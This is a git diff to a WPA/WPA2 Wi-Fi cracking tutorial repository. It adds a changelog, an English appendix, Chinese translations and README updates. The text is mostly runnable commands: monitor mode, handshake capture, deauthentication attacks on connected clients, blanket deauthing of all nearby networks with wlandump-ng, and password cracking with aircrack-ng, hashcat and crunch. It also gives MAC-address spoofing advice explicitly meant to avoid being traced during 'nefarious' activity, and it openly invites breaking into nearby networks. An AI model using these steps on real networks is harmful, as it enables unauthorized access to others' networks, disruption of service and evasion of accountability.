diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..0435a76 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,20 @@ +# Changelog + +## 1.3 + +- Add Chinese versions as README.zh.md and appendix.zh.md thanks to [neal1991](https://github.com/neal1991). + +## 1.2 + +- Add MacOS/OSX support via the [appendix](appendix.md), thanks [harshpatel991](https://github.com/harshpatel991)! + +## 1.1 + +- Add [appendix](appendix.md) + - Handshake capture with `wlandump-ng` + - Programatic wordlist generation with `crunch` + - Macchanger info + +## 1.0 + +- Original tutorial with rolling changes for small updates and typos, etc... diff --git a/README.md b/README.md index dbdba52..7fa5df3 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and [Aircrack-ng](http://aircrack- This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the [end of this document](#deauth-attack). -If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). +If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). For a variety of suggestions and alternative methods, see the [appendix](appendix.md). [neal1991](https://github.com/neal1991) has also graciously provided translations to [this document](README.zh.md) and the [appendix](appendix.zh.md) in Chinese if you prefer those versions. __DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.__ @@ -13,10 +13,10 @@ __DISCLAIMER: This software/tutorial is for educational purposes only. It should This tutorial assumes that you: - Have a general comfortability using the command-line -- Are running a debian-based linux distro (preferably [Kali linux](https://www.kali.org/)) +- Are running a debian-based linux distro, preferably [Kali linux](https://www.kali.org/) (OSX users see the [appendix](appendix.md)) - Have [Aircrack-ng](http://aircrack-ng.org/) installed - `sudo apt-get install aircrack-ng` -- Have a wireless card that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) (I recommend [this one](https://www.amazon.com/s/?ie=UTF8&keywords=tl+wn722n). See [here](http://aircrack-ng.org/doku.php?id=compatible_cards) for more info.) +- Have a wireless card that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) (see [here](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html) for a list of supported devices) ## Cracking a Wi-Fi Network @@ -195,7 +195,7 @@ Now, leave `airodump-ng` running and open a new terminal. We will use the `airep ```bash # -0 2 specifies we would like to send 2 deauth packets. Increase this number -# if need be with the risk of noticably interrupting client network activity +# if need be with the risk of noticeably interrupting client network activity # -a is the MAC of the access point # -c is the MAC of the client aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 @@ -244,8 +244,19 @@ cap2hccapx.bin capture/-01.cap capture/-01.hccapx HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh ``` +## Appendix + +The response to this tutorial was so great that I've added suggestions and additional material from community members as an [appendix](appendix.md). Check it out to learn how to: + +- Capture handshakes and crack WPA passwords on MacOS/OSX +- Capture handshakes from every network around you with `wlandump-ng` +- Use `crunch` to generate 100+GB wordlists on-the-fly +- Spoof your MAC address with `macchanger` + +A [Chinese version](appendix.zh.md) of the appendix is also available. + ## Attribution Much of the information presented here was gleaned from [Lewis Encarnacion's awesome tutorial](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html). Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat. -Shout out to [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [hartzell](https://github.com/hartzell), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post. +Overwhelming thanks to [neal1991](https://github.com/neal1991) for translating this tutorial into [Chinese](README.zh.md). Further shout outs to [hiteshnayak305](https://github.com/hiteshnayak305), [enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post. diff --git a/README.zh.md b/README.zh.md new file mode 100644 index 0000000..1da76ad --- /dev/null +++ b/README.zh.md @@ -0,0 +1,263 @@ +# Wi-Fi破解 + +利用Airodump-ng以及[Aircrack-ng](http://aircrack-ng.org/)/[Hashcat](http://hashcat.net/)破解WPA/WPA2 WI-FI路由器。 + +这是一个简要的按照步骤的教程,描述了如何破解使用弱密码保护的WI-FI网络。它不会极其详尽,但是对于你测试你自己的网络安全或者入侵附近网络已经包含足够的信息。下面列出的攻击完全是被动的(仅仅监听,不会广播你电脑上的任何东西),并且对于你破解的但是却未真正使用的密码是无法监测到的。一个可选的破解认证的攻击可以用于加速侦查过程并且在[文档末尾](#deauth-attack)有描述。 + + +如果你熟悉这个过程,你可以跳过这段描述直接跳到[底部](#命令列表)使用的命令列表。至于多种建议以及可行的方法,参考[附录](appendix.zh.md)。[neal1991](https://github.com/neal1991)也将[这份文档](README.zh.md)以及[附录](appendix.zh.md)翻译成中文,可以选择你偏好的版本。 + +__声明:这个软件/教程仅仅用于教学。不应该使用它从事任何非法活动。作者不会对它的使用负责。不要犯傻。__ + +## 入门 + +这个教程认为你: + +- 可以流畅使用命令行 +- 使用一个基于debian的linux发行版本,最好是[Kali linux](https://www.kali.org/)(OSX用户参考[附录](appendix.zh.md)) +- 安装[Aircrack-ng](http://aircrack-ng.org/) + - `sudo apt-get install aircrack-ng` +- 无线网卡能够支持[监视模式](https://en.wikipedia.org/wiki/Monitor_mode)(对于支持的设备列表,参考[这](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html)) + +## 破解一个WI-FI网络 + +### 监视模式 + +开始通过下面的命令可以列出支持监视模式的无线接口: + +```bash +airmon-ng +``` + +如果你看到没有列出一个接口,那么你的无线网卡就不支持监视模式 😞 + +我们将假设你的无线接口名称是`wlan0`,但是请确保使用正确的名称如果你的名称与这个不同的话。接下来,我们将接口转换为监视模式: + +```bash +airmon-ng start wlan0 +``` + +运行`iwconfig`。你现在应该能够看到列出一个新的监视模式接口(像`mon0`或者`wlan0mon`)。 + +### 找到你的目标 + +使用你的监视接口开始监听附近的[802.11 Beacon 帧](https://en.wikipedia.org/wiki/Beacon_frame)广播: + +```bash +airodump-ng mon0 +``` + +你应该可以看到类似于下面的输出。 + +``` +CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 + + BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests + 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 + 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP + 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro + 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme + 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome + 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 + 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 + 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT + BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root + EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca +``` + +出于这个演示的目的,我们将会破解我自己的网络,"hackme"。记住利用`airodump-ng`展示的BSSID MAC地址以及信道(`CH`)号,因为在下一个步骤中我们将会需要它们。 + +### 捕获4路握手 + +WPA/WPA2使用[4路握手](https://security.stackexchange.com/questions/17767/four-way-handshake-in-wpa-personal-wpa-psk)来认证设备连接网络。你不想要明白这些的含意,但是你必须捕获这些握手从而能够破解网络密码。这些握手发生在设备连接网络的时候,比如,当你的邻居工作回家的时候。我们通过之前命令发现的信道以及bssid值来使用`airmon-ng`来监视目标网络。 + +```bash +# 将-c 以及--bssid值替换为你的目标网络值 +# -w 制订了我们保存捕获数据包保存的文件夹 +airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0 +``` +``` + CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] + + BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS +``` + +现在我们等待... 一旦我们捕捉到一个握手,你应该能够马上在屏幕的右上角看到类似于`[ WPA handshake: bc:d3:c9:ef:d2:67`的一些东西。 + +如果你已经感觉不耐烦了,并且希望实施一次攻击,你可以强制设备连接到目标网站来重新连接,并且在目标网络中发送恶意的解除验证数据包。这经常就能够捕获4路握手。参考下面的[deauth攻击章节](#deauth-attack)来获取关于此的信息。 + +一旦你捕获了一个握手,按下`ctrl-c`来终止`airodump-ng`。你应该可以看到一个你告诉`airodump-ng`用来保存捕获信息的`.cap`文件(比如叫做`-01.cap`)。我们将会使用这个捕获文件来破解网络密码。我喜欢对这个文件重命名从而反映我们现在尝试破解的网络名称: + +```bash +mv ./-01.cap hackme.cap +``` + +### 破解网络密码 + +最后一个步骤是使用捕获的握手来破解密码。如果你能够访问GPU,我**强烈**建议你使用`hashcat`来破解密码。我已经创建了一个叫做[`naive-hashcat`](https://github.com/brannondorsey/naive-hashcat)的简单工具可以让使用hashcat变得非常方便。如果你不能够访问GPU,还有很多在线的GPU破解服务可以使用,比如[GPUHASH.me](https://gpuhash.me/)或者[OnlineHashCrack](https://www.onlinehashcrack.com/wifi-wpa-rsna-psk-crack.php)。你也可以常使用Aircrack-ng来进行CPU破解。 + +注意下面的攻击方法都假设用户使用弱的密码。大多数WPA/WPA2路由自带12位强随机密码,大多数用户都不会去更改。如果你去尝试破解这些密码,我建议你使用[Probable-Wordlists WPA-length](https://github.com/berzerk0/Probable-Wordlists/tree/master/Real-Passwords/WPA-Length) 字典文件。 + +#### 使用`naive-hashcat`破解(推荐) + +在我们使用naive-hashcat破解密码之前,我们需要将我们的`.cap`文件转换成同等hashcat文件格式`.hccapx`。你可以通过上传`.cap`文件到 或者直接使用[`cap2hccapx`](https://github.com/hashcat/hashcat-utils)工具。 + +```bash +cap2hccapx.bin hackme.cap hackme.hccapx +``` + +接着,下载并且运行`naive-hashcat`: + +```bash +# 下载 +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# 下载134MBrockyou字典文件 +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt + +# 破解!宝贝!破解! +# 2500是hashcat对于WPA/WPA2的哈希模式 +HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +Naive-hashcat使用多种[字典](https://hashcat.net/wiki/doku.php?id=dictionary_attack),[规则](https://hashcat.net/wiki/doku.php?id=rule_based_attack),[组合](https://hashcat.net/wiki/doku.php?id=combinator_attack)以及[伪装](https://hashcat.net/wiki/doku.php?id=mask_attack)(聪明的暴力)攻击,并且它需要花费数天甚至数月来破解中等长度的密码。破解的密码将会保存到hackme.pot,因此阶段性地检查这个文件。一旦你破解这个密码,你将会在你的`POI_FILE`看到类似于下面的内容: + +``` +e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet +``` + +最后两块被`:`分隔开来,分别是网络名称和密码。 + +如果你希望不需要`naive-hashcat`来使用`hashcat`的话请参考[这个页面](https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2)。 + +#### 利用Aircrack-ng破解 + +Aircrack-ng可以用于在你的CPU上运行来进行非常基本的字典攻击。在你运行攻击之前,你需要一个单词表。我推荐使用非常著名的rockyou字典文件: + +```bash +# 下载134MBrockyou字典文件 +curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +注意,如果网络密码不再这个单词文件话,你将不能破解密码。 + +```bash +# -a2指定WPA2,-b是BSSID,-w是单词文件 +aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap +``` + +如果密码被破解了,你将会在终端看到一个`KEY FOUND!`消息,在其后将会看到网络密码的纯文本。 + +``` + Aircrack-ng 1.2 beta3 + + + [00:01:49] 111040 keys tested (1017.96 k/s) + + + KEY FOUND! [ hacktheplanet ] + + + Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 + 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E + + Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 + 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 + 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 + 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 + + EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 +``` + +## 解除认证攻击 + +解除认证攻击会将伪造的身份验证数据包从您的计算机发送到连接到您尝试破解的网络的客户端。 这些数据包包括伪造的“发件人”地址,使得它们像客户端那样从接入点本身发送出去。 收到这样的数据包后,大多数客户端断开与网络的连接,并立即重新连接,如果您正在使用`airodump-ng`进行侦听,则提供4路握手。 + +使用`airodump-ng`监视特定接入点(使用`-c channel --bssid MAC`),直到看到客户端(`STATION`)连接。 连接的客户端看起来像这样,`64:BC:0C:48:97:F7`是客户端MAC。 + +``` + CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] + + BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS + + BSSID STATION PWR Rate Lost Frames Probe + + 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS +``` + +现在,让`airodump-ng`运行并打开一个新的终端。 我们将使用`aireplay-ng`命令向我们的受害者客户端发送假的接触认证数据包,强制其重新连接到网络,并希望在此过程中抓取握手。 + +```bash +# -0 2 指定了我们应该发送2个解除认证的数据包。如果需要考虑到被周围网络活动大段的风险, +# 可以增加这个数字 +# -a 是接入点的MAC +# -c 是客户端的MAC +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 +``` + +你可以选择得通过广播解除认证数据包到所有连接的客户端: + +```bash +# 尽管不是所有的客户端都支持广播解除认证 +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0 +``` + +一旦你发送了解除认证数据包,回到你的`airodump-ng`进程,运气好的话你现在应该看到右上角:`[WPA握手:9C:5C:8E:C9:AB:C0`。 现在你已经捕获了握手,你应该准备好[破解网络密码](#crack-the-network-password)。 + +## 命令列表 + +下面列出了破解WPA/WPA2网络所需的所有命令,以最少的解释为依据。 + +```bash +# 将你的设备设置成监视模式 +airmon-ng start wlan0 + +# 监听附近所有的beacon帧来获取目标BSSID以及信道 +airodump-ng mon0 + +# 开始监听握手 +airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 + +# 选择性的对于连接的设备进行解除验证从而强制握手 +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 + +########## 利用aircrack-ng破解密码... ########## + +# 如果需要的话下载134MB的rockyou.txt字典文件 +curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt + +# 利用w/ aircrack-ng破解 +aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap + +########## 或者利用naive-hashcat破解密码 ########## + +# 将cap转换成hccapx +cap2hccapx.bin capture/-01.cap capture/-01.hccapx + +# 利用naive-hashcat破解 +HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +## 附录 + +对本教程的回应是非常好的,我已经添加了社区成员的建议和附加资料作为[附录](#appendix.zh.md)。看看如何: + +- 在MacOS/OSX上捕获握手并且破解WPA密码 +- 利用`wlandump-ng`捕获从你周围每个网络捕获握手 +- 使用`crunch`即时生成100多GB的单词列表 +-  利用`macchanger`伪造你的MAC地址 + +现在也提供[中文版本](appendix.zh.md)附录。 + +## 致谢 + +这里提供的大部分信息都是从[Lewis Encarnacion的绝妙的教程](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html)收集的。 感谢在Aircrack-ng和Hashcat上工作的优秀作者和维护者。 + +非常感谢[neal1991](https://github.com/neal1991)将本教程翻译成[中文](README.zh.md)。另外也感谢[hiteshnayak305](https://github.com/hiteshnayak305),[enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore),[hivie7510](https://www.reddit.com/user/hivie7510),[cprogrammer1994](https://github.com/cprogrammer1994),[0XE4](https://github.com/0XE4),[hartzell](https://github.com/hartzell),[zeeshanu](https://github.com/zeeshanu),[flennic](https://github.com/flennic),[bhusang](https://github.com/bhusang),[tversteeg](https://github.com/tversteeg),[gpetrousov](https://github.com/gpetrousov),[crowchirp](https://github.com/crowchirp)和[Shark0der](https://github.com/shark0der),他们还在[Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/)和GitHub。如果您有兴趣听取WPA2的一些建议替代方案,请在[这](https://news.ycombinator.com/item?id=14840539)参考Hacker News的一些重要讨论。 diff --git a/appendix.md b/appendix.md new file mode 100644 index 0000000..6e7c2d8 --- /dev/null +++ b/appendix.md @@ -0,0 +1,168 @@ +# Appendix + +After the initial release of this tutorial, several people from various corners of the internet reached out with comments and suggestions. In an effort two keep the original tutorial short and sweet, I've included information about their wonderful suggestions here, and added some of my own. Here you will find info on: + +- Wi-Fi cracking on MacOS/OSX +- Capturing handshakes with `landump-ng` +- Generating wordlists with `crunch` +- Protecting your identity with `macchanger` + +## Wi-Fi cracking on MacOS/OSX + +Huge thanks to [@harshpatel991](https://github.com/harshpatel991) for contributing this guide. The following explains how to use built-in MacOS/OSX tools to capture a 4-way handshake and naive-hashcat to determine the password of a WPA/WPA2 wireless network. This method has been tested on OSX versions 10.10 and 10.12 but will likely work with other versions as well. Like the main tutorial, it assumes you have a [wireless card](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html) that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode). We've tested this on both Early-2012 and Mid-2015 Macbook Pros with great success. + +### Wireless Diagnostics tools + +Luckily, OSX comes with a suite of wireless diagnostic tools. To open them, hold down the option key on your keyboard and click on the Wi-Fi icon in the menu bar. Then click "Open Wireless Diagnostics..." + +### Determine the channel of your target network + +With Wireless Diagnostics open, click on Window > Scan. Find the target network, note its channel and width. + +### Capture a 4-way Handshake + +1. With Wireless Diagnostics open, click on Window > Sniffer. Select the channel and width that you found in the previous step. +2. Now you'll need to wait for a device to connect to the target network. If you are testing this on your network (which you should be), reconnect a wireless device to capture a handshake. +3. Once you think you've got a handshake, click Stop. +4. The `.wcap` capture file will either be saved to your Desktop or `/var/tmp/` depending on your operating system version. +5. Convert the capture file to `.hccapx` by uploading it to https://hashcat.net/cap2hccapx/. If you captured any handshakes, the site will start downloading a `.hccapx` file. No download will be prompted if you did not. + +### Crack the password with `naive-hashcat` + +```bash +# clone naive-hashcat +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# build from source on MacOS/OSX +./build-hashcat-osx.sh + +# download the 134MB rockyou dictionary file +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +Finally, run `naive-hashcat.sh`. Change `handshake.hccapx` to the name of the file you downloaded from [hashcat.net](https://hashcat.net/cap2hccapx/). `cracked.pot` is the name of the output file. + +``` +HASH_FILE=handshake.hccapx POT_FILE=cracked.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +Thanks again to [@harshpatel991](https://github.com/harshpatel991), as well as [phillips321](http://www.phillips321.co.uk/) for his [post](https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going/) about building hashcat for OSX. + +## Capturing handshakes with `wlandump-ng` + +[@enilfodne](https://github.com/enilfodne) has [informed me](https://github.com/brannondorsey/wifi-cracking/issues/15) that the hashcat community has a prefered tool for capturing WPA 4-way handshakes, called `wlandump-ng`. This tool belongs to a suite of hashcat related utilities called [hcxtools](https://github.com/ZerBea/hcxtools) developed by [ZerBea](https://github.com/ZerBea), and has notable perks over `airdump-ng`. `wlandump-ng` allows you to blanket capture handshakes from every nearby network at once, hopping Wi-Fi channels in order to increase collection. + + +```bash +# clone hcxtools +git clone https://github.com/ZerBea/hcxtools +cd hcxtools + +# build and install +# you will likely need to apt install the required dependencies: +# https://github.com/ZerBea/hcxtools#requirements +make +sudo make install + +# blanket death connected clients from all nearby access points and listen for re-connections +# replace wlan0 with your wireless device name +wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20 + +# once you've got a capture file, you can convert it to the hashcat capture format with +cap2hccapx.bin capture.cap capture.hccapx +``` + +`wlandump-ng` command-line args (use `-h` flag for full list): + +- `-c 1`: start in the 2.4Ghz range from channel 1 (will go to 13) +- `-t 60`: stay on each channel for 60s (experiment with lower values, default is `5`) +- `-d 100`: send deauth every 100 beacon frames +- `-D 10`: send disassosciation packets every 10 beacons frames +- `-m 512`: internal ringbuffer size, use 512 for low resource machines +- `-b`: activate beaconing to last 10 probe requests +- `-r`: reset deauthentication/disassosciation counter if hop loop is on channel 1 +- `-s 20`: display 20 status lines + +**WARNING:** Using this is likely illegal in most places. See [here](https://github.com/ZerBea/hcxtools#warning) for more info. + +`wlandump-ng` also offers the option to run in passive mode without transmitting any deauth/disassociation frames. This is recommended if you are are sensitive to disrupting the network activity of those around you (which you should be). The trade-off is that you will capture far fewer handshakes, but this method makes the capture undetectable. + +```bash +# run with default settings in passive mode +wlandump-ng -i wlan0 -o capture.cap -p -s 20 +``` + +## Generating wordlists with `crunch` + +`crunch`is a tool to generate wordlists using combinations of a given string or pattern. We can use crunch to generate a password list on-the-fly and pipe it to `aircrack-ng` without having the wordlist saved to disk. + +```bash +# install crunch +sudo apt-get install crunch +``` + +To get an idea of how crunch works, run it from the command-line (be ready to press `ctrl-c` once it starts spewing passwords): + +```bash +# syntax 8 8 are min-length and max-length of password to generate +# 01234567890 is the set of characters to combine/permute to construct the passwords +crunch 8 8 0123456789 +``` + +``` +Crunch will now generate the following amount of data: 900000000 bytes +858 MB +0 GB +0 TB +0 PB +Crunch will now generate the following number of lines: 100000000 +00000000 +00000001 +00000002 +00000003 +00000004 +00000005 +00000006 +00000007 +00000008 +00000009 +... +99999999 +``` + +We can pipe the output of `crunch` as the input to `aircrack-ng`, using the passwords that it generates as our wordlist. Here we use the `crunch` special rule character `%` to denote a digit. This command attempts to crack WPA passwords that are 10-digit phone numbers (using 102GB of numbers generated by crunch on-the-fly): + +```bash +# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase +# '%' - replaced with numbers and '^' - is replaced with special chars +# *************** don't forget '-' at the end +crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w - +``` + +Thanks to [@hiteshnayak305](https://github.com/hiteshnayak305) for the introduction to `crunch` and including this update as a [PR](https://github.com/brannondorsey/wifi-cracking/pull/17). + +## Protecting your identify with `macchanger` + +Whenever you are doing anything remotely nefarious with Wi-Fi, it is a good idea to spoof your the MAC address of your Wi-Fi device so that any network traffic that gets recorded can't be tied to serial assigned by your device manufacturer. + +This is trivial with `macchanger`: + +```bash +# download MAC changer +sudo apt-get install macchanger + +# bring the device down +sudo ifconfig wlan0 down + +# change the mac +# -A pics a random MAC w/ a valid vendor +# -r makes it truly random +# -p restores it to the original hardware MAC +sudo macchanger -A wlan0 + +# bring the device back up +sudo ifconfig wlan0 up +``` + +If you've got multiple cards, it might also be a good idea to do this to all of them. Or better yet, bring unused wireless interfaces down whenever you are attempting to capture handshakes, to leave as little trace as possible. Note that spoofing changes do not persist across reboots. diff --git a/appendix.zh.md b/appendix.zh.md new file mode 100644 index 0000000..a4bcc72 --- /dev/null +++ b/appendix.zh.md @@ -0,0 +1,168 @@ +# 附录 +在本教程初次发布之后,来自互联网各个角落的一些人提出了意见和建议。 在努力保持原始教程简短而优美的基础上,我在这里介绍了有关他们精彩建议的信息,并添加了我自己的一些。 在这里,你可以找到以下信息: + +- 在MacOS/OSX上破解WI-FI +- 利用`landump-ng`捕获握手 +- 利用`crunch`生成单词列表 +- 利用`macchanger`保护你的身份 + +## 在MacOS/OSX上破解WI-FI + +非常感谢[@harshpatel991](https://github.com/harshpatel991)提供本指南。以下说明如何使用内置的MacOS/OSX工具捕获4路握手和naive-hashcat来确定WPA/WPA2无线网络的密码。 此方法已在OSX 10.10和10.12版上进行了测试,但也可能与其他版本一起使用。 像主教程一样,它假设你有一个[无线网卡](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html)支持[监视模式](https://en.wikipedia.org/wiki/Monitor_mode)。我们已经在2012年上半年和2015年中期MacBook Pro上取得了巨大的成功。 + +### 无线诊断工具 + +幸运的是,OSX配备了一套无线诊断工具。 要打开它们,请按住键盘上的选项键,然后单击菜单栏中的Wi-Fi图标。 然后点击“打开无线诊断...” + +### 决定目标网络信道 + +打开无线诊断程序,单击窗口>扫描。 找到目标网络,注意其信道和宽度。 + +### 捕获一个4路握手 + +1. 打开无限诊断,点击窗口>嗅探器。选择你在上一步中找到的信道和宽度。 +2. 现在,你需要等待设备连接到目标网络。如果你正在网络上测试(你应该),请重新连接无线设备以捕获握手。 +3. 一旦你认为已经捕获手握手,请点击停止。 +4. 根据你的操作系统版本,`.wcap`捕获文件将被保存到桌面或`/var/tmp/`。 +5.将捕获文件转换为`.hccapx`,将其上传到https://hashcat.net/cap2hccapx/。 如果你捕获到任何握手,站点将开始下载一个`.hccapx`文件。 如果没有,将不会提示下载。 + +### 利用`naive-hashcat`破解密码 + +```bash +# 克隆naive-hashcat +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# 在MacOS/OSX上构建源代码 +./build-hashcat-osx.sh + +# 下载134MB rockyou字典文件 +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +最后,运行`naive-hashcat.sh`。将`handshake.hccapx`的名称改成你从[hashcat.net](https://hashcat.net/cap2hccapx/)下载的文件名称。`cracked.pot`是输出文件名称。 + +``` +HASH_FILE=handshake.hccapx POT_FILE=cracked.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +再次感谢[@harshpatel991](https://github.com/harshpatel991),以及感谢[phillips321](http://www.phillips321.co.uk/)他的在OSX上构建hashcat的[帖子](https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going/)。 + +## 利用`wlandump-ng`来捕获握手 + +[@enilfodne](https://github.com/enilfodne)已经[告诉我](https://github.com/brannondorsey/wifi-cracking/issues/15)hashcat社区对于捕获WPA 4路握手有了更好的工具,叫做`wlandump-ng`。这个工具属于与hashcat相关的工具集[hcxtools](https://github.com/ZerBea/hcxtools)系列之中,由[ZerBea](https://github.com/ZerBea)开发,名声已经超过了`airdump-ng`。`wlandump-ng`允许你一次性从每个附近的网络上全面捕获握手信息,跳过Wi-Fi信道,以增加收集。 + + +```bash +# 克隆hcxtools +git clone https://github.com/ZerBea/hcxtools +cd hcxtools + +# 构建并且安装 +# 你将可能需要apt来安装需要的依赖 +# https://github.com/ZerBea/hcxtools#requirements +make +sudo make install + +# 覆盖所有失去从附近接入点失去连接的客户端并且监听重新连接 +# 将wlan0替换成你的无线设备名称 +wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20 + +# 一旦你获得了捕获的文件,你可以利用以下命令将其转换成hashcat捕获格式 +cap2hccapx.bin capture.cap capture.hccapx +``` + +`wlandump-ng`命令行参数(使用`h`标志来获得完整列表): + 